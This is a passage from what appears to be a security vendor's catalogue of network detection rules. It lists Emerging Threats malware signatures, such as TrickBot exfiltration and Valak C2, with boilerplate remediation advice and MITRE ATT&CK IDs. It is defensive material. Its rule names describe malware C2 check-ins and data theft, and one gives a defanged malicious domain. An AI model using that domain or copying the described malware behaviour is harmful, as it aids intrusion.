
Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/SandCat CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sarwent Initial Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sarwent Initial Checkin CnC Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sarwent Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Satana Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Scarsi Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Scieron-A Checkin via HTTP POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Scieron-A UA (HTClient)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sefnit Initial Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sehyioa Variant Activity (Download)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sehyioa Variant Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Shiz.fxm/Agent-TBT Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sinresby.B Downloader CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sisproc Variant POST to CnC Server

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sisron/BackDoor.Cybergate.1 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Small.AB or related Post-infection checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Small.qh/xSock User-Agent Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Snatch Ransomware - Encryption Finished

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Snatch Ransomware - Encryption Started

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/SodaMaster CnC HTTPS Checkin M1

Description

Recommendation

ET MALWARE Win32/SodaMaster CnC HTTPS Checkin M2

Description

Recommendation

ET MALWARE Win32/SodaMaster domain observed in TLS SNI (www. rare-coisns. com)

Description

Recommendation

ET MALWARE Win32/Spectre Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Spy.Agent.QAQ Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Banker.AAQD Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Banker.AAXV Retrieving key from Pinterest

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Banker.ABCG Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Banker.ACUT CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.SpyEyes.bllw CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.KeyLogger.ODN Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Odlanor CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Pavica.FH Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Socelars.S CnC Activity M4 (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Tuscas

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Spy/TVRat Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/StoredBt.A Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/StreamFlaw.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Swizzor User-Agent (Swizz03r)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Swrort.A Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Swrort.A Checkin 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TaskPerformer Downloader CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Tdss User Agent Detected (Mozzila)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Tesch.B CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Teslacrypt Ransomware HTTP CnC Beacon M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Teslacrypt Ransomware HTTP CnC Beacon M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Tflower Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Tiggre Variant Activity Sending System Files (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TinyNuke CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Tnega Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Tobfy.S

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Toby.N Multilocker Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Toby.N Multilocker Image Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Toby.N Multilocker Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Tofsee Connectivity Check M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Tofsee Connectivity Check M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trapwot FakeAV Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trapwot FakeAV Post Infection CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Travnet.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.TreasureHunter Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrickBot Anchor Variant Style External IP Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrickBot CnC Initial Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trickbot Data Exfiltration

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trickbot Data Exfiltration M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trickbot Data Exfiltration M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trickbot Data Exfiltration M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrickBot maserv Module CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrickBot maserv Module Command

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Agent.AXMO CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Trojan.Agent.FSTT CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Trojan.Agent.U3D7V0 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrojanDownloader.Agent.FC CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrojanDownloader.Agent.GEM CnC Checkin

Description

Recommendation

ET MALWARE Win32/TrojanDownloader.Agent.GEM CnC Command Fetch

Description

Recommendation

ET MALWARE Win32/TrojanDownloader.Agent.GEM CnC Domain Fetch

Description

Recommendation

ET MALWARE Win32/TrojanDownloader.Chekafe.D User-Agent my_check_data On Off HTTP Port

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrojanDownloader.Delf.BVP Win32/BioData CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/TrojanDownloader.Delf.BXC CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/TrojanDownloader.Small.AWO CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrojanDownloader.Waski.F Locker DL URI Struct Jul 25 2014

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M10

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M7

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M8

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M9

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrojanProxy.JpiProx.B CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/TrojanProxy.JpiProx.B CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Trojan.Valyria.6015 CnC Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Troj.Cidox Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.BrowserStealer CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.BrowserStealer CnC Keep-Alive

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.BrowserStealer Data Exfil M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.BrowserStealer Data Exfil M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.BrowserStealer Data Exfil M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk Downloader CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.Joia CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.VBScript Requesting Instruction from CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Urausy.C Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Urausy.C Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Urausy.C Checkin 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Urausy.C Checkin 4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ursnif Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Usteal.B Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Uwamson Variant Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak - Plugin Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak - Stage 2 - Response - Plugin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak - Stage 2 - Response - Task

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak <v20 Checkin - Server Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak <v9 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak <v9 - Stage 2 - Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak Variant CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Variant.Zusy.402698 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

